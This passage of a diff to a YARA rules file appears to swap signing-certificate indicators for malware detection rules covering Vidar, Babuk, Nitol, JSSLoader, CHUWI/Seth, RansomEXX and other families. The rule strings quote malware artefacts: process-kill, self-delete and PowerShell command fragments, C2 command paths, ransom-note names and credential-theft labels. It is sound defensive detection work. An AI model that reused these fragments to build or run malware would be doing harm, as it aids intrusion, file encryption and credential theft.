+		$s5 = "main.antiVirtualBox" ascii
+		$s6 = "main.antiVmware" ascii
+		$s7 = "main.deleteShadows" ascii
+		$s8 = "main.delUAC" ascii
+		$s9 = "main.KillProcess" ascii
+		$s10 = "main.delExploit" ascii
+		$s11 = "main.encrypt" ascii
+		$s12 = "main.ClearLogDownload" ascii
+		$s13 = "main.ClearLog" ascii
+		$s14 = "main.EndEncrypt" ascii
+		$s15 = "main.RunFuckLogAndSoft" ascii
+		$s16 = "main.ClearUsercache" ascii
+		$s17 = "main.FirstDuty" ascii
+		$s18 = ".lockedv1" ascii
+		$s19 = "WSAStartup\\clear.bat\\ngrok.exe\\video.mp4" ascii
+		$s20 = "net stop " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and pe.signatures [ i ] . serial == "00:c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43" )
+		uint16( 0 ) == 0x5a4d and $go and 6 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Fc7065Abf8303Fb472B8Af85918F5C24 : FILE
+rule DITEKSHEN_MALWARE_Win_Alfonoso : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Alfonoso / Shurk / HunterStealer infostealer"
 		author = "ditekSHen"
-		id = "d8c25f8a-e129-5cd4-9e60-d2e7ebbb1ea6"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "2766e74e-c13a-5ce4-8f62-de9cc11e3cf0"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L120-L131"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3609-L3638"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8ce0d25ef802948f754f155010f42d76256895ebd6ffdce8d97063dada58e668"
+		logic_hash = "18e5731ffd70abf2ab70852d54dacc3588dd90cfb4f2ceaee66dfce750535b26"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "b61a6607154d27d64de35e7529cb853dcb47f51f"
-		importance = 20
+		snort2_sid = "920102"
+		snort3_sid = "920100"
+		clamav_sig = "MALWARE.Win.Trojan.Alfonso"
+
+	strings:
+		$s1 = "%s\\etilqs_" fullword ascii
+		$s2 = "SELECT name, rootpage, sql FROM '%q'.%s" fullword ascii
+		$s3 = "%s-mj%08X" fullword ascii
+		$s4 = "| Site:" ascii
+		$s5 = "| Login:" ascii
+		$s6 = "| Password:" ascii
+		$s7 = "| BUILD NAME:" ascii
+		$s8 = "recursive_directory_iterator" ascii
+		$s9 = { 2e 7a 69 70 00 00 00 00 2e 7a 6f 6f 00 00 00 00
+                2e 61 72 63 00 00 00 00 2e 6c 7a 68 00 00 00 00
+                2e 61 72 6a 00 00 00 00 2e 67 7a 00 2e 74 67 7a
+                00 00 00 00 }
+		$s10 = "Shurk Steal" fullword ascii
+		$s11 = ":memory:" fullword ascii
+		$s12 = "current_path()" fullword ascii
+		$s13 = "vtab:%p:%p" fullword ascii
+		$f1 = "chatlog.txt" ascii
+		$f2 = "servers.fav" ascii
+		$f3 = "\\USERDATA.DAT" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIG IN VISION SP Z O O" and pe.signatures [ i ] . serial == "00:fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24" )
+		uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or ( 6 of ( $s* ) and 2 of ( $f* ) ) or ( all of ( $f* ) and 5 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00B61B8E71514059Adc604Da05C283E514 : FILE
+rule DITEKSHEN_MALWARE_Win_Vidar : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Vidar / ArkeiStealer"
 		author = "ditekSHen"
-		id = "d52bd370-a1da-56f1-8edd-da61c9e2e75b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "d858c463-26d7-5f96-ad9a-cb261a8c61c6"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L133-L144"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3640-L3650"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b771d40e4e2db1d3f26d8fb2fa140f57871712700e584005d2377b701fc9538a"
+		logic_hash = "c95c8694c05ff0e8d28f098e668a8ae8fa70130e31af6c0e540c4e5596007e41"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "67ee69f380ca62b28cecfbef406970ddd26cd9be"
-		importance = 20
+
+	strings:
+		$s1 = "\"os_crypt\":{\"encrypted_key\":\"" fullword ascii
+		$s2 = "screenshot.jpg" fullword wide
+		$s3 = "Content-Disposition: form-data; name=\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APP DIVISION ApS" and pe.signatures [ i ] . serial == "00:b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_51Cd5393514F7Ace2B407C3Dbfb09D8D : FILE
+rule DITEKSHEN_MALWARE_Win_Babuk : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Babuk ransomware"
 		author = "ditekSHen"
-		id = "f2f7b08e-111c-570b-b376-79145050ca42"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "6bb7093f-bbef-5b43-b4f9-be72ae4ef319"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L146-L157"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3652-L3674"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "389dbdc85035fdd94e831940eda910349134600e921720729840c932123db36d"
+		logic_hash = "5ca5c5106747cf8f4ccd5df4ddbc78321fea3c8f533cb807a704d270eb956007"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "07a9fd6af84983dbf083c15983097ac9ce761864"
-		importance = 20
+
+	strings:
+		$s1 = "ecdh_pub_k.bin" wide
+		$s2 = "How To Restore Your Files.txt" wide
+		$s3 = /(babuk|babyk)\s(ransomware|locker)/ ascii nocase
+		$s4 = "/login.php?id=" ascii
+		$s5 = "http://babuk" ascii
+		$s6 = "bootsect.bak" fullword wide
+		$s7 = "Can't open file after killHolder" ascii
+		$s8 = "Can't OpenProcess" ascii
+		$s9 = "DoYouWantToHaveSexWithCuongDong" ascii
+		$arg1 = "-lanfirst" fullword ascii
+		$arg2 = "-lansecond" fullword ascii
+		$arg3 = "-nolan" fullword ascii
+		$arg4 = "shares" fullword wide
+		$arg5 = "paths" fullword wide
+		$arg6 = "gdebug" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APPI CZ a.s" and pe.signatures [ i ] . serial == "51:cd:53:93:51:4f:7a:ce:2b:40:7c:3d:bf:b0:9d:8d" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( 3 of ( $arg* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_030012F134E64347669F3256C7D050C5 : FILE
+rule DITEKSHEN_MALWARE_Win_Nitol : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Nitol backdoor"
 		author = "ditekSHen"
-		id = "7f16b535-8a0f-583d-8bc3-0abf24f26632"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "d545f826-11ff-5d0f-9a95-8232b19d35b6"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L159-L170"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3676-L3704"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "68bfd2e146e3b2bd1222de7f9981bb0e373bcb4727a81eb7060af36e6275d438"
+		logic_hash = "c0ddcd6179bea2f3af77ae198e07f55f62884e07a975623ae41bcec163060f89"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "959caa354b28892608ab1bb9519424c30bebc155"
-		importance = 20
+
+	strings:
+		$s1 = "%$#@!.aspGET ^&*().htmlGET" ascii
+		$s2 = "Applications\\iexplore.exe\\shell\\open\\command" fullword ascii
+		$s3 = "taskkill /f /im rundll32.exe" fullword ascii
+		$s4 = "\\Tencent\\Users\\*.*" fullword ascii
+		$s5 = "[Pause Break]" fullword ascii
+		$s6 = ":]%d-%d-%d  %d:%d:%d" fullword ascii
+		$s7 = "GET %s HTTP/1.1" fullword ascii
+		$s8 = "GET %s%s HTTP/1.1" fullword ascii
+		$s9 = "Accept-Language: zh-cn" fullword ascii
+		$s10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)" fullword ascii
+		$s11 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
+		$s12 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
+		$w1 = ".aspGET" ascii
+		$w2 = ".htmGET" ascii
+		$w3 = ".htmlGET" ascii
+		$domain = "www.xy999.com" fullword ascii
+		$v2_1 = "loglass" fullword ascii
+		$v2_2 = "rlehgs" fullword ascii
+		$v2_3 = "eherrali" fullword ascii
+		$v2_4 = "agesrlu" fullword ascii
+		$v2_5 = "lepejagas" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Futumarket LLC" and pe.signatures [ i ] . serial == "03:00:12:f1:34:e6:43:47:66:9f:32:56:c7:d0:50:c5" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( all of ( $v2* ) ) or ( $domain and 3 of them ) or ( #w1 > 2 and #w2 > 2 and #w3 > 2 and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00B7F19B13De9Bee8A52Ff365Ced6F67Fa : FILE
+rule DITEKSHEN_MALWARE_Win_Strongpity : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects StrongPity"
 		author = "ditekSHen"
-		id = "b9cbe1bd-b24f-5599-a8b9-9e6f9b70f37f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "9dcc5edb-5c86-5412-af63-f88d488d5829"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L172-L183"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3706-L3720"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "afdc41aed0480593bb8c92955db044ebe1a695d4912176123e26e052a3e9d3ea"
+		logic_hash = "e92147966cd68152eb536b805c4918462f72f64280d1b3df800bb41266aa232f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "61708a3a2bae5343ff764de782d7f344151f2b74"
-		importance = 20
+
+	strings:
+		$s1 = "Boundary%08X" ascii wide
+		$s2 = "Content-Disposition: form-data; name=\"file\";" fullword ascii
+		$s3 = "%sfilename=\"%ls\"" fullword ascii
+		$s4 = "name=%ls&delete=" fullword ascii
+		$s5 = "Content-Type: application/octet-stream" fullword ascii
+		$s6 = "cmd.exe /C ping" wide
+		$s7 = "& rmdir /Q /S \"" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALEXIS SECURITY GROUP, LLC" and pe.signatures [ i ] . serial == "00:b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4C8Def294478B7D59Ee95C61Fae3D965 : FILE
+rule DITEKSHEN_MALWARE_Win_Jssloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects JSSLoader RAT/backdoor"
 		author = "ditekSHen"
-		id = "2f95a688-2fb2-55b7-9cd5-44586d6d4dc8"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "ef710c21-5c64-513e-b882-b5768478976e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L185-L196"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3722-L3752"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d9e956d7d5b9389aebafd4b7025818ac8eb5a72aaa1b94068a12aa7a8029f97c"
+		logic_hash = "91764dabfb40cb51914110de229ddb00cd565078fef83c825f7a86fa502fda37"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = ""
-		importance = 20
+
+	strings:
+		$cmd1 = "Cmd_UPDATE" fullword ascii
+		$cmd2 = "Cmd_IDLE" fullword ascii
+		$cmd3 = "Cmd_EXE" fullword ascii
+		$cmd4 = "Cmd_VBS" fullword ascii
+		$cmd5 = "Cmd_JS" fullword ascii
+		$cmd6 = "Cmd_PWS" fullword ascii
+		$cmd7 = "Cmd_RAT" fullword ascii
+		$cmd8 = "Cmd_UNINST" fullword ascii
+		$cmd9 = "Cmd_RunDll" fullword ascii
+		$s1 = "ANSWER_OK" fullword ascii
+		$s2 = "GatherDFiles" ascii
+		$s3 = "CommandCd" fullword ascii
+		$s4 = "URL_GetCmd" fullword ascii
+		$s5 = "\"host\": \"{0}\", \"domain\": \"{1}\", \"user\": \"{2}\"" wide
+		$s6 = "pc_dns_host_name" wide
+		$s7 = "\"adinfo\": { \"adinformation\":" wide
+		$e1 = "//e:vbscript" wide
+		$e2 = "//e:jscript" wide
+		$e3 = "/c rundll32.exe" wide
+		$e4 = "/C powershell" wide
+		$e5 = "C:\\Windows\\System32\\cmd.exe" wide
+		$e6 = "echo del /f" wide
+		$e7 = "AT.U() {0}. format" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREAM SECURITY USA INC" and pe.signatures [ i ] . serial == "4c:8d:ef:29:44:78:b7:d5:9e:e9:5c:61:fa:e3:d9:65" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $cmd* ) or 5 of ( $s* ) or all of ( $e* ) or 7 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0A23B660E7322E54D7Bd0E5Acc890966 : FILE
+rule DITEKSHEN_MALWARE_Win_CHUWI_Seth : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "First sighting on 2020-01-05 didn't include ransomware artificats. Second sighting on 2020-01-24 with several correlations between the two samples now include ransomware artifacts."
 		author = "ditekSHen"
-		id = "c9817cbd-edce-5ae0-ad70-58d592ac415f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "62af3cd3-59c3-580b-9d66-71fd4acfaf17"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L198-L209"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3754-L3801"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6b9009d0c509b38107eba5742613f8ec6f48e447225c664e374ef56d64b035f0"
+		logic_hash = "e6e3f5e9af093268667f67fec2176a943b35721e9f220804e176c6b5a3bb24e1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "c1e0c6dc2bc8ea07acb0f8bdb09e6a97ae91e57c"
-		importance = 20
+		snort2_sid = "920103-920105"
+		snort3_sid = "920101-920103"
+
+	strings:
+		$cmd1 = "shell_command" fullword ascii
+		$cmd2 = "check_command" fullword ascii
+		$cmd3 = "down_exec" fullword ascii
+		$cmd4 = "open_link" fullword ascii
+		$cmd5 = "down_exec" fullword ascii
+		$cmd6 = "exe_link" fullword ascii
+		$cmd7 = "shellCommand" fullword ascii
+		$cmd8 = "R_CMMAND" fullword ascii
+		$cnc1 = "/check_command.php?HWID=" ascii
+		$cnc2 = "&act=get_command" ascii
+		$cnc3 = "/get_command.php?hwid=" ascii
+		$cnc4 = "&command=down_exec" ascii
+		$cnc5 = "&command=message" ascii
+		$cnc6 = "&command=open_link" ascii
+		$cnc7 = "&command=down_exec" ascii
+		$cnc8 = "&command=shell" ascii
+		$pdb = "\\Users\\CHUWI\\Documents\\CPROJ\\Downloader\\svchost" ascii
+		$rcnc1 = "inc/check_command.php" ascii
+		$rcnc2 = "inc/get_command.php" ascii
+		$rcnc3 = "php?btc" ascii
+		$rcnc4 = "php?hwid" ascii
+		$x1 = "> %USERPROFILE%\\Desktop\\HOW_DECRYPT_FILES.seth.txt" ascii
+		$x2 = "/C dir /b %USERPROFILE%\\Documents > %temp%\\doc.txt" ascii
+		$x3 = "/C dir /b %USERPROFILE%\\Desktop > %temp%\\desk.txt" ascii
+		$x4 = "/C dir /b %USERPROFILE%\\Downloads > %temp%\\downs.txt" ascii
+		$x5 = "/C dir /b %USERPROFILE%\\Pictures > %temp%\\pics.txt" ascii
+		$x6 = "for /F \"delims=\" %%a in ('mshta.exe \"%~F0\"') do set \"HTA=%%a\"" ascii
+		$x7 = "\\svchost.exe" fullword ascii
+		$x8 = ".seth" fullword ascii
+		$x9 = "MyAgent" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ARTBUD RADOM SP Z O O" and pe.signatures [ i ] . serial == "0a:23:b6:60:e7:32:2e:54:d7:bd:0e:5a:cc:89:09:66" )
+		uint16( 0 ) == 0x5a4d and ( $pdb or 5 of ( $cmd* ) or 4 of ( $cnc* ) or all of ( $rcnc* ) or 5 of ( $x* ) or 8 of them )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_04332C16724Ffeda5868D22Af56Aea43 : FILE
+rule DITEKSHEN_MALWARE_Win_Gulpix : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Gulpix/HyperPlus backddor"
 		author = "ditekSHen"
-		id = "7e6be2f5-2f34-5337-8beb-4ccc6c50ad2d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "b3dfd1d9-42fe-57d4-8047-135103689be7"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L211-L222"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3803-L3832"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "338e7d9374de04d00162c9caf86d922f4d659b024ae7908f0e02ca4709a14a1d"
+		logic_hash = "5026726f093b31b444fc934ac1446b6c25f182b8714a37da05f4498f32a9a65f"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "cba350fe1847a206580657758ad6813a9977c40e"
-		importance = 20
+
+	strings:
+		$x1 = "MainServer.dll" fullword ascii
+		$x2 = "NvSmartMax.dat" fullword wide
+		$x3 = "NvSmartMax.dll" fullword wide
+		$x4 = "http://+:80/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7/" fullword wide
+		$s1 = "IP retriever" fullword wide
+		$s2 = "\\cmd.exe" fullword wide
+		$s3 = "\\msnetwork-cache.db" fullword wide
+		$s4 = "http://+:" wide
+		$s5 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" fullword wide
+		$s6 = "\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup" ascii
+		$s7 = "Got a unknown request for %ws" wide
+		$s8 = "HttpReceiveRequestEntityBody failed with %lu" wide
+		$s9 = "FD873AC4-CF86-4FED-84EC-4BD59C6F17A7" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bespoke Software Solutions Limited" and pe.signatures [ i ] . serial == "04:33:2c:16:72:4f:fe:da:58:68:d2:2a:f5:6a:ea:43" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 6 of ( $s* ) or ( 2 of ( $x* ) and 4 of ( $s* ) ) or ( 2 of them and pe.exports ( "daemon" ) and pe.exports ( "run" ) and pe.exports ( "session" ) and pe.exports ( "work" ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_085B70224253486624Fc36Fa658A1E32 : FILE
+rule DITEKSHEN_MALWARE_Linux_Ransomexx : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
-		author = "ditekSHen"
-		id = "8d0f4499-1ed2-5277-be80-0b7f3499b360"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects RansomEXX ransomware"
+		author = "ditekshen"
+		id = "b449afc7-9055-55ed-a876-316d1aea8fee"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L224-L235"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3834-L3858"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8779cca652b366ce33a3735069fdc35657a6bed5b469a956cd236d76901f8f54"
+		logic_hash = "c233ccc3e741cb2c53f182c48093e41595a82a3f4e5bdb1dc0204f1f57b96c2a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "36834eaf0061cc4b89a13e019eccc6e598657922"
-		importance = 20
+		clamav_sig = "MALWARE.Linux.Ransomware.RansomEXX"
+
+	strings:
+		$c1 = "crtstuff.c" fullword ascii
+		$c2 = "cryptor.c" fullword ascii
+		$c3 = "ransomware.c" fullword ascii
+		$c4 = "logic.c" fullword ascii
+		$c5 = "enum_files.c" fullword ascii
+		$c6 = "readme.c" fullword ascii
+		$c7 = "ctr_drbg.c" fullword ascii
+		$s1 = "regenerate_pre_data" fullword ascii
+		$s2 = "g_RansomHeader" fullword ascii
+		$s3 = "CryptOneBlock" fullword ascii
+		$s4 = "RansomLogic" fullword ascii
+		$s5 = "CryptOneFile" fullword ascii
+		$s6 = "encrypt_worker" fullword ascii
+		$s7 = "list_dir" fullword ascii
+		$s8 = "ctr_drbg_update_internal" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Best Fud, OOO" and pe.signatures [ i ] . serial == "08:5b:70:22:42:53:48:66:24:fc:36:fa:65:8a:1e:32" )
+		uint16( 0 ) == 0x457f and ( 5 of ( $c* ) or 6 of ( $s* ) or ( 3 of ( $c* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0086E5A9B9E89E5075C475006D0Ca03832 : FILE
+rule DITEKSHEN_MALWARE_Win_Trickbotmodule : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
-		author = "ditekSHen"
-		id = "898bfe5f-5ac6-51f3-be55-09279a286835"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects Trickbot modules"
+		author = "ditekshen"
+		id = "c56c664f-5928-5e2e-ab06-0b9d504981be"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L237-L248"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3860-L3881"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "613f21989dc369ef6b1d8e42a0d707810ef064c608e4e34ba5eb475164f14abc"
+		logic_hash = "4d06653dad5f8a18598855212548364b3c3d2b68b99784846b494fcb1d1c8df9"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "76f6c507e0bcf7c6b881f117936f5b864a3bd3f8"
-		importance = 20
+
+	strings:
+		$mc = "<moduleconfig>" ascii
+		$s1 = "<autostart>" ascii
+		$s2 = "<nohead>" ascii
+		$s3 = "<needinfo" ascii
+		$s4 = "<conf ctl" ascii
+		$s5 = "<limit>" ascii
+		$w1 = "<sys>yes</sys>" ascii
+		$w2 = "<sys>no</sys>" ascii
+		$w3 = "<autostart>yes</autostart>" ascii
+		$w4 = "<autostart>no</autostart>" ascii
+		$w5 = "<nohead>yes</nohead>" ascii
+		$w6 = "<nohead>no</nohead>" ascii
+		$w7 = /<limit>\d+<\/limit>/ ascii
+		$w8 = "<moduleconfig> </moduleconfig" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BlueMarble GmbH" and pe.signatures [ i ] . serial == "00:86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32" )
+		uint16( 0 ) == 0x5a4d and $mc and ( 2 of ( $s* ) or ( 1 of ( $s* ) and 1 of ( $w* ) ) or 1 of ( $w* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_039668034826Df47E6207Ec9Daed57C3 : FILE
+rule DITEKSHEN_MALWARE_Win_Gaudox : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
-		author = "ditekSHen"
-		id = "8ae5f710-db8e-5d29-b247-a103f0878aa5"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		description = "Detects Gaudox RAT"
+		author = "ditekshen"
+		id = "c60ac433-20a1-5f01-9447-fa99621bd9e2"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L250-L261"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3883-L3893"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b9579ba5dac45e38ef7b2b3381d1651395a4f648c68ae8e6fc36a0ea2d9b6300"
+		logic_hash = "117ee89e264067ab3e695688872bbe7d83963731e877d04ac7e2505e64f6e793"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f98bdfa941ebfa2fe773524e0f9bbe9072873c2f"
-		importance = 20
+
+	strings:
+		$s1 = "hdr=%s&tid;=%s&cid;=%s&trs;=%i" ascii wide
+		$s2 = "\\\\\\\\.\\\\PhysicalDrive%u" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CHOO FSP, LLC" and pe.signatures [ i ] . serial == "03:96:68:03:48:26:df:47:e6:20:7e:c9:da:ed:57:c3" )
